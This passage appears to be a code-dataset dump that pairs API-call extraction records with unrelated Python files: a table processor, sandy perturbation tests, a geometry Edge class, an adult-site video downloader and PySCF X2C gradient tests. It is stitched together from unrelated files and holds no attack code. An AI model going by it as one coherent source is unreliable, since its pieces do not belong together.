"copy.deepcopy",
"os.remove",
"xml_formats.PageXml.PageXml.createPageXmlDocument",
"os.path.basename",
"common.Component.Component.__init__",
"common.Component.Component.setParams",
"os.system",
"util.Polygon.Polygon",
"shapely.geometry.LineString",
"xml_formats.PageXml.PageXml.getChildByName",
"common.trace.traceln",
"xml_formats.PageXml.MultiPageXml.makeMultiPageXml",
"lxml.etree.parse",
"os.path.join",
"os.listdir",
"shapely.affinity.translate"
] |
[((4947, 5048), 'common.Component.Component.__init__', 'Component.Component.__init__', (['self', '"""tableProcessor"""', 'self.usage', 'self.version', 'self.description'], {}), "(self, 'tableProcessor', self.usage, self.\n version, self.description)\n", (4975, 5048), True, 'import common.Component as Component\n'), ((5678, 5722), 'common.Component.Component.setParams', 'Component.Component.setParams', (['self', 'dParams'], {}), '(self, dParams)\n', (5707, 5722), True, 'import common.Component as Component\n'), ((12169, 12215), 'xml_formats.PageXml.PageXml.createPageXmlDocument', 'PageXml.createPageXmlDocument', (['"""NLE"""', '""""""', '(0)', '(0)'], {}), "('NLE', '', 0, 0)\n", (12198, 12215), False, 'from xml_formats.PageXml import PageXml\n'), ((12530, 12550), 'copy.deepcopy', 'deepcopy', (['firstTable'], {}), '(firstTable)\n', (12538, 12550), False, 'from copy import deepcopy\n'), ((12731, 12789), 'os.path.abspath', 'os.path.abspath', (["('./%s/col/%s' % (self.coldir, self.docid))"], {}), "('./%s/col/%s' % (self.coldir, self.docid))\n", (12746, 12789), False, 'import sys, os\n'), ((13461, 13519), 'os.path.abspath', 'os.path.abspath', (["('./%s/col/%s' % (self.coldir, self.docid))"], {}), "('./%s/col/%s' % (self.coldir, self.docid))\n", (13476, 13519), False, 'import sys, os\n'), ((14141, 14199), 'os.path.abspath', 'os.path.abspath', (["('./%s/col/%s' % (self.coldir, self.docid))"], {}), "('./%s/col/%s' % (self.coldir, self.docid))\n", (14156, 14199), False, 'import sys, os\n'), ((14827, 14881), 'os.path.join', 'os.path.join', (["(self.coldir + os.sep + 'col')", 'self.docid'], {}), "(self.coldir + os.sep + 'col', self.docid)\n", (14839, 14881), False, 'import sys, os\n'), ((14900, 14937), 'xml_formats.PageXml.MultiPageXml.makeMultiPageXml', 'MultiPageXml.makeMultiPageXml', (['lFiles'], {}), '(lFiles)\n', (14929, 14937), False, 'from xml_formats.PageXml import MultiPageXml\n'), ((15511, 15596), 'os.path.abspath', 'os.path.abspath', (["('%s%s%s%s%s' % (self.coldir, os.sep, 'col', os.sep, self.docid))"], {}), "('%s%s%s%s%s' % (self.coldir, os.sep, 'col', os.sep, self.docid)\n )\n", (15526, 15596), False, 'import sys, os\n'), ((434, 462), 'os.path.abspath', 'os.path.abspath', (['sys.argv[0]'], {}), '(sys.argv[0])\n', (449, 462), False, 'import sys, os\n'), ((9678, 9719), 'xml_formats.PageXml.PageXml.getChildByName', 'PageXml.getChildByName', (['page', '"""TableCell"""'], {}), "(page, 'TableCell')\n", (9700, 9719), False, 'from xml_formats.PageXml import PageXml\n'), ((12814, 12846), 'os.path.join', 'os.path.join', (['localpath', '"""*.jpg"""'], {}), "(localpath, '*.jpg')\n", (12826, 12846), False, 'import sys, os\n'), ((13544, 13576), 'os.path.join', 'os.path.join', (['localpath', '"""*.jpg"""'], {}), "(localpath, '*.jpg')\n", (13556, 13576), False, 'import sys, os\n'), ((14224, 14256), 'os.path.join', 'os.path.join', (['localpath', '"""*.jpg"""'], {}), "(localpath, '*.jpg')\n", (14236, 14256), False, 'import sys, os\n'), ((18978, 18992), 'os.system', 'os.system', (['job'], {}), '(job)\n', (18987, 18992), False, 'import sys, os\n'), ((19005, 19060), 'common.trace.traceln', 'traceln', (["('table registration done: %s' % prnregfilename)"], {}), "('table registration done: %s' % prnregfilename)\n", (19012, 19060), False, 'from common.trace import traceln\n'), ((19284, 19298), 'os.system', 'os.system', (['job'], {}), '(job)\n', (19293, 19298), False, 'import sys, os\n'), ((19311, 19349), 'common.trace.traceln', 'traceln', (["('GL done: %s' % prnglfilename)"], {}), "('GL done: %s' % prnglfilename)\n", (19318, 19349), False, 'from common.trace import traceln\n'), ((19628, 19642), 'os.system', 'os.system', (['job'], {}), '(job)\n', (19637, 19642), False, 'import sys, os\n'), ((19655, 19693), 'common.trace.traceln', 'traceln', (["('LA done: %s' % prnlafilename)"], {}), "('LA done: %s' % prnlafilename)\n", (19662, 19693), False, 'from common.trace import traceln\n'), ((21360, 21372), 'util.Polygon.Polygon', 'Polygon', (['lXY'], {}), '(lXY)\n', (21367, 21372), False, 'from util.Polygon import Polygon\n'), ((21390, 21405), 'shapely.geometry.LineString', 'LineString', (['lXY'], {}), '(lXY)\n', (21400, 21405), False, 'from shapely.geometry import LineString\n'), ((23025, 23050), 'shapely.affinity.translate', 'translate', (['line'], {'yoff': '(-20)'}), '(line, yoff=-20)\n', (23034, 23050), False, 'from shapely.affinity import translate\n'), ((9555, 9595), 'xml_formats.PageXml.PageXml.getChildByName', 'PageXml.getChildByName', (['page', '"""TextLine"""'], {}), "(page, 'TextLine')\n", (9577, 9595), False, 'from xml_formats.PageXml import PageXml\n'), ((10299, 10311), 'util.Polygon.Polygon', 'Polygon', (['lXY'], {}), '(lXY)\n', (10306, 10311), False, 'from util.Polygon import Polygon\n'), ((10914, 10926), 'util.Polygon.Polygon', 'Polygon', (['lXY'], {}), '(lXY)\n', (10921, 10926), False, 'from util.Polygon import Polygon\n'), ((16507, 16551), 'os.path.join', 'os.path.join', (['self.coldir', '"""col"""', 'self.docid'], {}), "(self.coldir, 'col', self.docid)\n", (16519, 16551), False, 'import sys, os\n'), ((22895, 22910), 'shapely.geometry.LineString', 'LineString', (['lXY'], {}), '(lXY)\n', (22905, 22910), False, 'from shapely.geometry import LineString\n'), ((16634, 16653), 'os.listdir', 'os.listdir', (['xmlpath'], {}), '(xmlpath)\n', (16644, 16653), False, 'import sys, os\n'), ((16779, 16824), 'os.remove', 'os.remove', (["('%s%s%s' % (xmlpath, os.sep, name))"], {}), "('%s%s%s' % (xmlpath, os.sep, name))\n", (16788, 16824), False, 'import sys, os\n'), ((17197, 17216), 'os.listdir', 'os.listdir', (['xmlpath'], {}), '(xmlpath)\n', (17207, 17216), False, 'import sys, os\n'), ((17567, 17587), 'lxml.etree.parse', 'etree.parse', (['oldname'], {}), '(oldname)\n', (17578, 17587), False, 'from lxml import etree\n'), ((17901, 17941), 'xml_formats.PageXml.PageXml.getChildByName', 'PageXml.getChildByName', (['page', '"""TextLine"""'], {}), "(page, 'TextLine')\n", (17923, 17941), False, 'from xml_formats.PageXml import PageXml\n'), ((18158, 18217), 'common.trace.traceln', 'traceln', (["('No table found in this document: %s' % self.docid)"], {}), "('No table found in this document: %s' % self.docid)\n", (18165, 18217), False, 'from common.trace import traceln\n'), ((13031, 13068), 'os.path.abspath', 'os.path.abspath', (["('%s' % sTemplatefile)"], {}), "('%s' % sTemplatefile)\n", (13046, 13068), False, 'import sys, os\n'), ((16833, 16852), 'os.listdir', 'os.listdir', (['xmlpath'], {}), '(xmlpath)\n', (16843, 16852), False, 'import sys, os\n'), ((16982, 17001), 'os.listdir', 'os.listdir', (['xmlpath'], {}), '(xmlpath)\n', (16992, 17001), False, 'import sys, os\n'), ((16657, 16679), 'os.path.basename', 'os.path.basename', (['name'], {}), '(name)\n', (16673, 16679), False, 'import sys, os\n'), ((17220, 17242), 'os.path.basename', 'os.path.basename', (['name'], {}), '(name)\n', (17236, 17242), False, 'import sys, os\n'), ((16856, 16878), 'os.path.basename', 'os.path.basename', (['name'], {}), '(name)\n', (16872, 16878), False, 'import sys, os\n'), ((17005, 17027), 'os.path.basename', 'os.path.basename', (['name'], {}), '(name)\n', (17021, 17027), False, 'import sys, os\n')]
|
import pytest
from io import StringIO
import numpy as np
import pandas as pd
import sandy
__author__ = "<NAME>"
#####################
# Test initialization
#####################
def test_from_file_1_column():
vals = '1\n5\n9'
file = StringIO(vals)
with pytest.raises(Exception):
sandy.Pert.from_file(file)
def test_from_file_non_monotonic():
vals = '1 1\n6 5\n5 2\n9 3'
file = StringIO(vals)
with pytest.raises(Exception):
sandy.Pert.from_file(file)
@pytest.fixture(scope="module")
def pert3():
vals = '1 1 5\n5 2 1\n9 3 1'
file = StringIO(vals)
return sandy.Pert.from_file(file)
def test_from_file_3_columns(pert3):
# should try and catch the warning
pass
def test_init_with_series(pert3):
pert = sandy.Pert(pert3.right)
assert pert.data.equals(pert3.data)
def test_init_with_dataframe(pert3):
with pytest.raises(Exception):
sandy.Pert(pert3.right.to_frame())
def test_init_with_intervalindex(pert3):
pert = sandy.Pert(pert3.data)
assert pert.data.equals(pert3.data)
################################
# Test initialization attributes
################################
def test_Pert_type(pert3):
assert isinstance(pert3, sandy.Pert)
def test_Pert_data_index_type(pert3):
assert isinstance(pert3.data.index, pd.IntervalIndex)
def test_Pert_data_index_right_values(pert3):
assert pert3.data.index.right.tolist() == [1, 5, 9]
def test_Pert_data_index_left_values(pert3):
assert pert3.data.index.left.tolist() == [0, 1, 5]
def test_Pert_data_index_float(pert3):
assert pert3.data.index.right.values.dtype == float
def test_Pert_data_values(pert3):
np.testing.assert_array_equal(pert3.data.values, [1,2,3])
def test_Pert_data_values_float(pert3):
assert pert3.data.values.dtype == float
########################
# Test attributes
########################
########################
# Test methods
########################
# def test_Spectrum_selfreshape(spec_const):
# S = spec_const.reshape(spec_const.right.index)
# assert np.allclose(S.data.values,spec_const.data.values)
# @pytest.mark.parametrize("eg, flux",
# [
# ([30], 500),
# ([6e-12], 0.6),
# ([5e-12], 0.5),
# ([4e-12], 0.4),
# ([1e-11], 1),
# ([18.896380829766173], 499),
# ([1e-10, 1e-9, 1e-8, 1e-7, 1e-6, 1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 1e0, 1e1, 20], 500),
# ]
# )
# def test_Spectrum_reshape(spec_const, eg, flux):
# S = spec_const.reshape(eg)
# assert S.right.index.tolist() == eg
# assert S.flux == pytest.approx(flux)
# @pytest.mark.parametrize("eg, err, errtype",
# [
# ([2, 1], True, ValueError),
# ([2, 2], False, None),
# ([-1, 2], True, ValueError),
# ]
# )
# def test_Spectrum_reshape_error(spec_const, eg, err, errtype):
# if err:
# with pytest.raises(errtype):
# spec_const.reshape(eg)
# else:
# spec_const.reshape(eg)
|
[
"sandy.Pert",
"io.StringIO",
"sandy.Pert.from_file",
"numpy.testing.assert_array_equal",
"pytest.fixture",
"pytest.raises"
] |
[((526, 556), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (540, 556), False, 'import pytest\n'), ((260, 274), 'io.StringIO', 'StringIO', (['vals'], {}), '(vals)\n', (268, 274), False, 'from io import StringIO\n'), ((435, 449), 'io.StringIO', 'StringIO', (['vals'], {}), '(vals)\n', (443, 449), False, 'from io import StringIO\n'), ((623, 637), 'io.StringIO', 'StringIO', (['vals'], {}), '(vals)\n', (631, 637), False, 'from io import StringIO\n'), ((650, 676), 'sandy.Pert.from_file', 'sandy.Pert.from_file', (['file'], {}), '(file)\n', (670, 676), False, 'import sandy\n'), ((816, 839), 'sandy.Pert', 'sandy.Pert', (['pert3.right'], {}), '(pert3.right)\n', (826, 839), False, 'import sandy\n'), ((1057, 1079), 'sandy.Pert', 'sandy.Pert', (['pert3.data'], {}), '(pert3.data)\n', (1067, 1079), False, 'import sandy\n'), ((1748, 1807), 'numpy.testing.assert_array_equal', 'np.testing.assert_array_equal', (['pert3.data.values', '[1, 2, 3]'], {}), '(pert3.data.values, [1, 2, 3])\n', (1777, 1807), True, 'import numpy as np\n'), ((285, 309), 'pytest.raises', 'pytest.raises', (['Exception'], {}), '(Exception)\n', (298, 309), False, 'import pytest\n'), ((320, 346), 'sandy.Pert.from_file', 'sandy.Pert.from_file', (['file'], {}), '(file)\n', (340, 346), False, 'import sandy\n'), ((460, 484), 'pytest.raises', 'pytest.raises', (['Exception'], {}), '(Exception)\n', (473, 484), False, 'import pytest\n'), ((495, 521), 'sandy.Pert.from_file', 'sandy.Pert.from_file', (['file'], {}), '(file)\n', (515, 521), False, 'import sandy\n'), ((931, 955), 'pytest.raises', 'pytest.raises', (['Exception'], {}), '(Exception)\n', (944, 955), False, 'import pytest\n')]
|
from ground.base import (Context,
Orientation)
from ground.hints import Point
from reprit.base import generate_repr
class Edge:
@classmethod
def from_endpoints(cls,
left: Point,
right: Point,
interior_to_left: bool,
context: Context) -> 'Edge':
"""Constructs edge given its endpoints."""
return cls(left, right, interior_to_left, context)
__slots__ = 'context', 'interior_to_left', 'left', 'right'
def __init__(self,
left: Point,
right: Point,
interior_to_left: bool,
context: Context) -> None:
assert left < right, 'Incorrect endpoints order'
self.context, self.interior_to_left, self.left, self.right = (
context, interior_to_left, left, right)
def __lt__(self, other: 'Edge') -> bool:
"""Checks if the edge is lower than the other."""
other_left_orientation = self.orientation_of(other.left)
other_right_orientation = self.orientation_of(other.right)
if other_left_orientation is other_right_orientation:
return other_left_orientation is Orientation.COUNTERCLOCKWISE
elif other_left_orientation is Orientation.COLLINEAR:
return other_right_orientation is Orientation.COUNTERCLOCKWISE
left_orientation = other.orientation_of(self.left)
right_orientation = other.orientation_of(self.right)
if left_orientation is right_orientation:
return left_orientation is Orientation.CLOCKWISE
elif left_orientation is Orientation.COLLINEAR:
return right_orientation is Orientation.CLOCKWISE
elif other_right_orientation is Orientation.COLLINEAR:
return other_left_orientation is Orientation.COUNTERCLOCKWISE
else:
return (left_orientation is Orientation.CLOCKWISE
if right_orientation is Orientation.COLLINEAR
# crossing edges are incomparable
else NotImplemented)
__repr__ = generate_repr(__init__)
def orientation_of(self, point: Point) -> Orientation:
"""Returns orientation of the point relative to the edge."""
return self.context.angle_orientation(self.left, self.right, point)
|
[
"reprit.base.generate_repr"
] |
[((2144, 2167), 'reprit.base.generate_repr', 'generate_repr', (['__init__'], {}), '(__init__)\n', (2157, 2167), False, 'from reprit.base import generate_repr\n')]
|
from mtdownloader import MTDownloader
from mtdownloader import readable as readableSize
from phuburl import resolver as PageResolver
import requests
import json
import time
def readableTime(s):
s=int(s)
if(s<60):
return '{}s'.format(s)
elif(s<3600):
return '{}m{}s'.format(s//60,s%60)
else:
return '{}h{}m{}s'.format(s//3600,(s%3600)//60,s%60)
def readConfig():
try:
with open('config.json') as f:
config=json.loads(f.read())
return config
except FileNotFoundError:
print('Unable to read config.')
return None
def setupConfig():
print('Welcome to PHDownloader config setup.')
config={}
str=input('Use proxy? (Y/n): ')
if(str=='' or str.lower()=='y'):
config["useProxy"]=True
config["proxy"]={}
str=input('http proxy (http://127.0.0.1:1080): ')
if(str!=''):
config["proxy"]["http"]=str
else:
config["proxy"]["http"]='http://127.0.0.1:1080'
str=input('https proxy (https://127.0.0.1:1080): ')
if(str!=''):
config["proxy"]["https"]=str
else:
config["proxy"]["https"]='https://127.0.0.1:1080'
else:
config["useProxy"]=False
config["proxy"]={"http":"http://127.0.0.1:1080","https":"https://127.0.0.1:1080"}
str=input("Use timeout? (None): ")
if(str=='' or str.lower()=='none'):
config["timeout"]=None
else:
config["timeout"]=int(str)
str=input("Use debug? (y/N): ")
if(str=='' or str.lower()=='n'):
config["debug"]=False
else:
config["debug"]=True
str=input("Allow overwrite? (y/N): ")
if(str=='' or str.lower()=='n'):
config["overwrite"]=False
else:
config["overwrite"]=True
with open('config.json','w') as f:
f.write(json.dumps(config,indent=4))
print('Config saved to `config.json`')
return config
if __name__ == "__main__":
config=readConfig()
if(config is None):
config=setupConfig()
if(config["useProxy"]):
theProxy=config["proxy"]
else:
theProxy=None
while True:
try:
url=input('Please input URL: ')
except EOFError:
break
try:
print('[BEGIN] {}'.format(url))
res=requests.get(url,proxies=theProxy)
info=PageResolver(res.text)
print(info)
downloader=MTDownloader(info['url'],filename=info['name'],overwrite=config["overwrite"],timeout=config["timeout"],proxy=theProxy,debug=config["debug"])
time_before=time.time()
downloader.start()
downloader.wait()
time_diff=time.time()-time_before
print('[DONE] {} ({} in {} at {})'.format(info["name"],
readableSize(downloader.length),readableTime(time_diff),
'{}/s'.format(readableSize(downloader.length/time_diff))))
except Exception as e:
print('[Error] {}'.format(e))
|
[
"json.dumps",
"time.time",
"requests.get",
"mtdownloader.MTDownloader",
"mtdownloader.readable",
"phuburl.resolver"
] |
[((1864, 1892), 'json.dumps', 'json.dumps', (['config'], {'indent': '(4)'}), '(config, indent=4)\n', (1874, 1892), False, 'import json\n'), ((2345, 2380), 'requests.get', 'requests.get', (['url'], {'proxies': 'theProxy'}), '(url, proxies=theProxy)\n', (2357, 2380), False, 'import requests\n'), ((2397, 2419), 'phuburl.resolver', 'PageResolver', (['res.text'], {}), '(res.text)\n', (2409, 2419), True, 'from phuburl import resolver as PageResolver\n'), ((2467, 2622), 'mtdownloader.MTDownloader', 'MTDownloader', (["info['url']"], {'filename': "info['name']", 'overwrite': "config['overwrite']", 'timeout': "config['timeout']", 'proxy': 'theProxy', 'debug': "config['debug']"}), "(info['url'], filename=info['name'], overwrite=config[\n 'overwrite'], timeout=config['timeout'], proxy=theProxy, debug=config[\n 'debug'])\n", (2479, 2622), False, 'from mtdownloader import MTDownloader\n'), ((2632, 2643), 'time.time', 'time.time', ([], {}), '()\n', (2641, 2643), False, 'import time\n'), ((2727, 2738), 'time.time', 'time.time', ([], {}), '()\n', (2736, 2738), False, 'import time\n'), ((2835, 2866), 'mtdownloader.readable', 'readableSize', (['downloader.length'], {}), '(downloader.length)\n', (2847, 2866), True, 'from mtdownloader import readable as readableSize\n'), ((2922, 2965), 'mtdownloader.readable', 'readableSize', (['(downloader.length / time_diff)'], {}), '(downloader.length / time_diff)\n', (2934, 2965), True, 'from mtdownloader import readable as readableSize\n')]
|
#!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import reduce
import unittest
import numpy
import scipy.linalg
from pyscf import lib
from pyscf import gto
from pyscf.x2c import sfx2c1e
from pyscf.x2c import sfx2c1e_grad
def _sqrt0(a):
w, v = scipy.linalg.eigh(a)
return numpy.dot(v*numpy.sqrt(w), v.conj().T)
def _invsqrt0(a):
w, v = scipy.linalg.eigh(a)
return numpy.dot(v/numpy.sqrt(w), v.conj().T)
def _sqrt1(a0, a1):
'''Solving first order of x^2 = a'''
w, v = scipy.linalg.eigh(a0)
w = numpy.sqrt(w)
a1 = reduce(numpy.dot, (v.conj().T, a1, v))
x1 = a1 / (w[:,None] + w)
x1 = reduce(numpy.dot, (v, x1, v.conj().T))
return x1
def _invsqrt1(a0, a1):
'''Solving first order of x^2 = a^{-1}'''
w, v = scipy.linalg.eigh(a0)
w = 1./numpy.sqrt(w)
a1 = -reduce(numpy.dot, (v.conj().T, a1, v))
x1 = numpy.einsum('i,ij,j->ij', w**2, a1, w**2) / (w[:,None] + w)
x1 = reduce(numpy.dot, (v, x1, v.conj().T))
return x1
def get_R(mol):
s0 = mol.intor('int1e_ovlp')
t0 = mol.intor('int1e_kin')
s0sqrt = _sqrt0(s0)
s0invsqrt = _invsqrt0(s0)
x0 = get_x0(mol)
c = lib.param.LIGHT_SPEED
stild = s0 + reduce(numpy.dot, (x0.T, t0*(.5/c**2), x0))
R = _invsqrt0(reduce(numpy.dot, (s0invsqrt, stild, s0invsqrt)))
R = reduce(numpy.dot, (s0invsqrt, R, s0sqrt))
return R
def get_r1(mol, atm_id, pos):
# See JCP 135 084114, Eq (34)
c = lib.param.LIGHT_SPEED
aoslices = mol.aoslice_by_atom()
ish0, ish1, p0, p1 = aoslices[atm_id]
s0 = mol.intor('int1e_ovlp')
t0 = mol.intor('int1e_kin')
s1all = mol.intor('int1e_ipovlp', comp=3)
t1all = mol.intor('int1e_ipkin', comp=3)
s1 = numpy.zeros_like(s0)
t1 = numpy.zeros_like(t0)
s1[p0:p1,:] =-s1all[pos][p0:p1]
s1[:,p0:p1] -= s1all[pos][p0:p1].T
t1[p0:p1,:] =-t1all[pos][p0:p1]
t1[:,p0:p1] -= t1all[pos][p0:p1].T
x0 = get_x0(mol)
x1 = get_x1(mol, atm_id)[pos]
sa0 = s0 + reduce(numpy.dot, (x0.T, t0*(.5/c**2), x0))
sa1 = s1 + reduce(numpy.dot, (x0.T, t1*(.5/c**2), x0))
sa1+= reduce(numpy.dot, (x1.T, t0*(.5/c**2), x0))
sa1+= reduce(numpy.dot, (x0.T, t0*(.5/c**2), x1))
s0_sqrt = _sqrt0(s0)
s0_invsqrt = _invsqrt0(s0)
s1_sqrt = _sqrt1(s0, s1)
s1_invsqrt = _invsqrt1(s0, s1)
R0_part = reduce(numpy.dot, (s0_invsqrt, sa0, s0_invsqrt))
R1_part = (reduce(numpy.dot, (s0_invsqrt, sa1, s0_invsqrt)) +
reduce(numpy.dot, (s1_invsqrt, sa0, s0_invsqrt)) +
reduce(numpy.dot, (s0_invsqrt, sa0, s1_invsqrt)))
R1 = reduce(numpy.dot, (s0_invsqrt, _invsqrt1(R0_part, R1_part), s0_sqrt))
R1 += reduce(numpy.dot, (s1_invsqrt, _invsqrt0(R0_part), s0_sqrt))
R1 += reduce(numpy.dot, (s0_invsqrt, _invsqrt0(R0_part), s1_sqrt))
return R1
def get_h0_s0(mol):
s = mol.intor_symmetric('int1e_ovlp')
t = mol.intor_symmetric('int1e_kin')
v = mol.intor_symmetric('int1e_nuc')
w = mol.intor_symmetric('int1e_pnucp')
nao = s.shape[0]
n2 = nao * 2
h = numpy.zeros((n2,n2), dtype=v.dtype)
m = numpy.zeros((n2,n2), dtype=v.dtype)
c = lib.param.LIGHT_SPEED
h[:nao,:nao] = v
h[:nao,nao:] = t
h[nao:,:nao] = t
h[nao:,nao:] = w * (.25/c**2) - t
m[:nao,:nao] = s
m[nao:,nao:] = t * (.5/c**2)
return h, m
def get_h1_s1(mol, ia):
aoslices = mol.aoslice_by_atom()
ish0, ish1, p0, p1 = aoslices[0]
nao = mol.nao_nr()
s1 = mol.intor('int1e_ipovlp', comp=3)
t1 = mol.intor('int1e_ipkin', comp=3)
v1 = mol.intor('int1e_ipnuc', comp=3)
w1 = mol.intor('int1e_ipspnucsp', comp=12).reshape(3,4,nao,nao)[:,3]
with mol.with_rinv_origin(mol.atom_coord(ia)):
rinv1 = -8*mol.intor('int1e_iprinv', comp=3)
prinvp1 = -8*mol.intor('int1e_ipsprinvsp', comp=12).reshape(3,4,nao,nao)[:,3]
n2 = nao * 2
h = numpy.zeros((3,n2,n2), dtype=v1.dtype)
m = numpy.zeros((3,n2,n2), dtype=v1.dtype)
rinv1[:,p0:p1,:] -= v1[:,p0:p1]
rinv1 = rinv1 + rinv1.transpose(0,2,1).conj()
prinvp1[:,p0:p1,:] -= w1[:,p0:p1]
prinvp1 = prinvp1 + prinvp1.transpose(0,2,1).conj()
s1ao = numpy.zeros_like(s1)
t1ao = numpy.zeros_like(t1)
s1ao[:,p0:p1,:] = -s1[:,p0:p1]
s1ao[:,:,p0:p1]+= -s1[:,p0:p1].transpose(0,2,1)
t1ao[:,p0:p1,:] = -t1[:,p0:p1]
t1ao[:,:,p0:p1]+= -t1[:,p0:p1].transpose(0,2,1)
c = lib.param.LIGHT_SPEED
h[:,:nao,:nao] = rinv1
h[:,:nao,nao:] = t1ao
h[:,nao:,:nao] = t1ao
h[:,nao:,nao:] = prinvp1 * (.25/c**2) - t1ao
m[:,:nao,:nao] = s1ao
m[:,nao:,nao:] = t1ao * (.5/c**2)
return h, m
def get_x0(mol):
c = lib.param.LIGHT_SPEED
h0, s0 = get_h0_s0(mol)
e, c = scipy.linalg.eigh(h0, s0)
nao = mol.nao_nr()
cl = c[:nao,nao:]
cs = c[nao:,nao:]
x0 = scipy.linalg.solve(cl.T, cs.T).T
return x0
def get_x1(mol, ia):
h0, s0 = get_h0_s0(mol)
h1, s1 = get_h1_s1(mol, ia)
e0, c0 = scipy.linalg.eigh(h0, s0)
nao = mol.nao_nr()
cl0 = c0[:nao,nao:]
cs0 = c0[nao:,nao:]
x0 = scipy.linalg.solve(cl0.T, cs0.T).T
h1 = numpy.einsum('pi,xpq,qj->xij', c0.conj(), h1, c0[:,nao:])
s1 = numpy.einsum('pi,xpq,qj->xij', c0.conj(), s1, c0[:,nao:])
epi = e0[:,None] - e0[nao:]
degen_mask = abs(epi) < 1e-7
epi[degen_mask] = 1e200
c1 = (h1 - s1 * e0[nao:]) / -epi
c1[:,degen_mask] = -.5 * s1[:,degen_mask]
c1 = numpy.einsum('pq,xqi->xpi', c0, c1)
cl1 = c1[:,:nao]
cs1 = c1[:,nao:]
x1 = [scipy.linalg.solve(cl0.T, (cs1[i] - x0.dot(cl1[i])).T).T
for i in range(3)]
return numpy.asarray(x1)
mol1 = gto.M(
verbose = 0,
atom = [["O" , (0. , 0. , 0.0001)],
[1 , (0. , -0.757 , 0.587)],
[1 , (0. , 0.757 , 0.587)]],
basis = '3-21g',
)
mol2 = gto.M(
verbose = 0,
atom = [["O" , (0. , 0. ,-0.0001)],
[1 , (0. , -0.757 , 0.587)],
[1 , (0. , 0.757 , 0.587)]],
basis = '3-21g',
)
mol = gto.M(
verbose = 0,
atom = [["O" , (0. , 0. , 0. )],
[1 , (0. , -0.757 , 0.587)],
[1 , (0. , 0.757 , 0.587)]],
basis = '3-21g',
)
class KnownValues(unittest.TestCase):
def test_x1(self):
with lib.light_speed(10) as c:
x_1 = get_x0(mol1)
x_2 = get_x0(mol2)
x1_ref = (x_1 - x_2) / 0.0002 * lib.param.BOHR
x1t = get_x1(mol, 0)
self.assertAlmostEqual(abs(x1t[2]-x1_ref).max(), 0, 7)
x0 = get_x0(mol)
h0, s0 = get_h0_s0(mol)
e0, c0 = scipy.linalg.eigh(h0, s0)
get_h1_etc = sfx2c1e_grad._gen_first_order_quantities(mol, e0, c0, x0)
x1 = get_h1_etc(0)[4]
self.assertAlmostEqual(abs(x1-x1t).max(), 0, 9)
def test_R1(self):
with lib.light_speed(10) as c:
R_1 = get_R(mol1)
R_2 = get_R(mol2)
R1_ref = (R_1 - R_2) / 0.0002 * lib.param.BOHR
R1t = get_r1(mol, 0, 2)
self.assertAlmostEqual(abs(R1t-R1_ref).max(), 0, 7)
x0 = get_x0(mol)
h0, s0 = get_h0_s0(mol)
e0, c0 = scipy.linalg.eigh(h0, s0)
get_h1_etc = sfx2c1e_grad._gen_first_order_quantities(mol, e0, c0, x0)
R1 = get_h1_etc(0)[6][2]
self.assertAlmostEqual(abs(R1-R1t).max(), 0, 9)
def test_hfw(self):
with lib.light_speed(10) as c:
x2c_1 = sfx2c1e.SpinFreeX2C(mol1)
x2c_2 = sfx2c1e.SpinFreeX2C(mol2)
x2cobj = sfx2c1e.SpinFreeX2C(mol)
fh_ref = (x2c_1.get_hcore() - x2c_2.get_hcore()) / 0.0002 * lib.param.BOHR
fh = x2cobj.hcore_deriv_generator(deriv=1)
self.assertAlmostEqual(abs(fh(0)[2] - fh_ref).max(), 0, 7)
x2c_1.xuncontract = 0
x2c_2.xuncontract = 0
x2cobj.xuncontract =0
fh_ref = (x2c_1.get_hcore() - x2c_2.get_hcore()) / 0.0002 * lib.param.BOHR
fh = x2cobj.hcore_deriv_generator(deriv=1)
self.assertAlmostEqual(abs(fh(0)[2] - fh_ref).max(), 0, 7)
x2c_1.xuncontract = 1
x2c_2.xuncontract = 1
x2cobj.xuncontract =1
x2c_1.approx = 'ATOM1E'
x2c_2.approx = 'ATOM1E'
x2cobj.approx = 'ATOM1E'
fh_ref = (x2c_1.get_hcore() - x2c_2.get_hcore()) / 0.0002 * lib.param.BOHR
fh = x2cobj.hcore_deriv_generator(deriv=1)
self.assertAlmostEqual(abs(fh(0)[2] - fh_ref).max(), 0, 7)
if __name__ == "__main__":
print("Full Tests for sfx2c1e gradients")
unittest.main()
|
[
"unittest.main",
"numpy.zeros_like",
"pyscf.x2c.sfx2c1e.SpinFreeX2C",
"numpy.asarray",
"numpy.zeros",
"numpy.einsum",
"pyscf.lib.light_speed",
"pyscf.gto.M",
"pyscf.x2c.sfx2c1e_grad._gen_first_order_quantities",
"functools.reduce",
"numpy.sqrt"
] |
[((6199, 6321), 'pyscf.gto.M', 'gto.M', ([], {'verbose': '(0)', 'atom': "[['O', (0.0, 0.0, 0.0001)], [1, (0.0, -0.757, 0.587)], [1, (0.0, 0.757, 0.587)]\n ]", 'basis': '"""3-21g"""'}), "(verbose=0, atom=[['O', (0.0, 0.0, 0.0001)], [1, (0.0, -0.757, 0.587)],\n [1, (0.0, 0.757, 0.587)]], basis='3-21g')\n", (6204, 6321), False, 'from pyscf import gto\n'), ((6385, 6509), 'pyscf.gto.M', 'gto.M', ([], {'verbose': '(0)', 'atom': "[['O', (0.0, 0.0, -0.0001)], [1, (0.0, -0.757, 0.587)], [1, (0.0, 0.757, \n 0.587)]]", 'basis': '"""3-21g"""'}), "(verbose=0, atom=[['O', (0.0, 0.0, -0.0001)], [1, (0.0, -0.757, 0.587)\n ], [1, (0.0, 0.757, 0.587)]], basis='3-21g')\n", (6390, 6509), False, 'from pyscf import gto\n'), ((6570, 6690), 'pyscf.gto.M', 'gto.M', ([], {'verbose': '(0)', 'atom': "[['O', (0.0, 0.0, 0.0)], [1, (0.0, -0.757, 0.587)], [1, (0.0, 0.757, 0.587)]]", 'basis': '"""3-21g"""'}), "(verbose=0, atom=[['O', (0.0, 0.0, 0.0)], [1, (0.0, -0.757, 0.587)], [\n 1, (0.0, 0.757, 0.587)]], basis='3-21g')\n", (6575, 6690), False, 'from pyscf import gto\n'), ((1123, 1136), 